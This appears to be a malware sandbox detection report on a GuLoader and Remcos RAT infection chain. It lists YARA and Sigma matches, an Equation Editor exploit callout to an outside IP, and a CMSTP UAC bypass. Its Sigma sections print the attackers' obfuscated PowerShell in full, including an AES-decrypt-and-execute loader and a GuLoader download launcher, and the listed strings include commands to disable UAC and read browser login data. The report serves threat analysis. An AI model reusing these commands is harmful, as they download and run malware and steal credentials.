00000019.00000002.967882170.0000000007895000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000C.00000002.454070604.0000000003760000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000C.00000002.454070604.0000000003760000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000C.00000002.454070604.0000000003760000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x4d28f0:$a1: Remcos restarted by watchdog! 0x4d2e68:$a3: %02i:%02i:%02i:%03i
Process Memory Space: powershell.exe PID: 3588	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 3588	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: powershell.exe PID: 3588	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: powershell.exe PID: 3588	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x3067f4:$a1: Remcos restarted by watchdog! 0x9b7003:$a1: Remcos restarted by watchdog! 0x306d4e:$a3: %02i:%02i:%02i:%03i 0x30717d:$a3: %02i:%02i:%02i:%03i 0x9b755d:$a3: %02i:%02i:%02i:%03i 0x9b7983:$a3: %02i:%02i:%02i:%03i
Process Memory Space: powershell.exe PID: 3588	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x4852fa:$b2: ::FromBase64String( 0x4883f2:$b2: ::FromBase64String( 0x4898df:$b2: ::FromBase64String( 0x48b606:$b2: ::FromBase64String( 0x49a613:$b2: ::FromBase64String( 0x49b064:$b2: ::FromBase64String( 0x49ba68:$b2: ::FromBase64String( 0x49ddf5:$b2: ::FromBase64String( 0x4c4fea:$b2: ::FromBase64String( 0x4c5bcd:$b2: ::FromBase64String( 0x4c84f5:$b2: ::FromBase64String( 0x4c98a5:$b2: ::FromBase64String( 0x51ad46:$b2: ::FromBase64String( 0x51b957:$b2: ::FromBase64String( 0x51c78b:$b2: ::FromBase64String( 0x563bd1:$b2: ::FromBase64String( 0x5b7e6c:$b2: ::FromBase64String( 0x5bbd3a:$b2: ::FromBase64String( 0x5bc920:$b2: ::FromBase64String( 0x5cbe06:$b2: ::FromBase64String( 0x5ce59b:$b2: ::FromBase64String(
Process Memory Space: RegAsm.exe PID: 3832	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 3832	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: RegAsm.exe PID: 3832	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x1c5fe:$a1: Remcos restarted by watchdog! 0x1cb58:$a3: %02i:%02i:%02i:%03i 0x1cf87:$a3: %02i:%02i:%02i:%03i
Process Memory Space: RegAsm.exe PID: 4044	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: powershell.exe PID: 1812	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 1812	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x994f6:$b2: ::FromBase64String( 0x9952d:$b2: ::FromBase64String( 0x99565:$b2: ::FromBase64String( 0x9959e:$b2: ::FromBase64String( 0x995d8:$b2: ::FromBase64String( 0x99613:$b2: ::FromBase64String( 0x9964f:$b2: ::FromBase64String( 0x9968c:$b2: ::FromBase64String( 0x996ca:$b2: ::FromBase64String( 0x99709:$b2: ::FromBase64String( 0xca92c:$s1: -join 0xcd498:$s1: -join 0x2218a1:$s1: -join 0x28d7fa:$s1: -join 0x94b4:$s3: reverse 0x13fd2:$s3: reverse 0x1177d5:$s3: reverse 0x118e54:$s3: reverse 0x11911f:$s3: reverse 0x1197c0:$s3: reverse 0x119f65:$s3: reverse
Process Memory Space: powershell.exe PID: 680	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 680	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1a4607:$b2: ::FromBase64String( 0x40515:$s1: -join 0x438b0:$s1: -join 0x1458aa:$s1: -join 0x1492be:$s1: -join 0x196068:$s1: -join 0xbebc0:$s3: reverse 0xcb114:$s3: reverse 0x3bb77:$s4: += 0x401ea:$s4: += 0x40400:$s4: += 0x404f7:$s4: += 0x43892:$s4: += 0x141a02:$s4: += 0x141a21:$s4: += 0x141a5c:$s4: += 0x141a79:$s4: += 0x141ab4:$s4: += 0x141b20:$s4: += 0x141bac:$s4: += 0x141cbb:$s4: +=
Click to see the 21 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
12.2.powershell.exe.3bc7e48.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
12.2.powershell.exe.3bc7e48.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
12.2.powershell.exe.3bc7e48.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690a8:$a1: Remcos restarted by watchdog! 0x69620:$a3: %02i:%02i:%02i:%03i
12.2.powershell.exe.3bc7e48.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x630fc:$str_a1: C:\Windows\System32\cmd.exe 0x63078:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63078:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63578:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63da8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6316c:$str_b2: Executing file: 0x641ec:$str_b3: GetDirectListeningPort 0x63b98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d18:$str_b7: \update.vbs 0x63194:$str_b9: Downloaded file: 0x63180:$str_b10: Downloading file: 0x63224:$str_b12: Failed to upload file: 0x641b4:$str_b13: StartForward 0x641d4:$str_b14: StopForward 0x63c70:$str_b15: fso.DeleteFile " 0x63c04:$str_b16: On Error Resume Next 0x63ca0:$str_b17: fso.DeleteFolder " 0x63214:$str_b18: Uploaded file: 0x631d4:$str_b19: Unable to delete: 0x63c38:$str_b20: while fso.FileExists(" 0x636b1:$str_c0: [Firefox StoredLogins not found]
12.2.powershell.exe.3bc7e48.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62fe8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f7c:$s1: CoGetObject 0x62f90:$s1: CoGetObject 0x62fac:$s1: CoGetObject 0x6cf38:$s1: CoGetObject 0x62f3c:$s2: Elevation:Administrator!new:
16.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
16.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
16.2.RegAsm.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
16.2.RegAsm.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
16.2.RegAsm.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
16.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
16.2.RegAsm.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
16.2.RegAsm.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
16.2.RegAsm.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
16.2.RegAsm.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
12.2.powershell.exe.3329a80.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
12.2.powershell.exe.3329a80.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
12.2.powershell.exe.3329a80.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x1856e8:$a1: Remcos restarted by watchdog! 0x185c60:$a3: %02i:%02i:%02i:%03i
12.2.powershell.exe.3329a80.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x17f628:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x17f5bc:$s1: CoGetObject 0x17f5d0:$s1: CoGetObject 0x17f5ec:$s1: CoGetObject 0x189578:$s1: CoGetObject 0x17f57c:$s2: Elevation:Administrator!new:
12.2.powershell.exe.3bc7e48.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
12.2.powershell.exe.3bc7e48.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
12.2.powershell.exe.3bc7e48.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
12.2.powershell.exe.3bc7e48.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
Click to see the 18 entries

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 104.168.45.34, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3468, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49176

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3468, TargetFilename: C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'

Sigma detected: Equation Editor Network Connection

Source: Network Connection

Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49176, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3468, Protocol: tcp, SourceIp: 104.168.45.34, SourceIsIpv6: false, SourcePort: 80

Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation

Source: Process started

Author: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPS

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

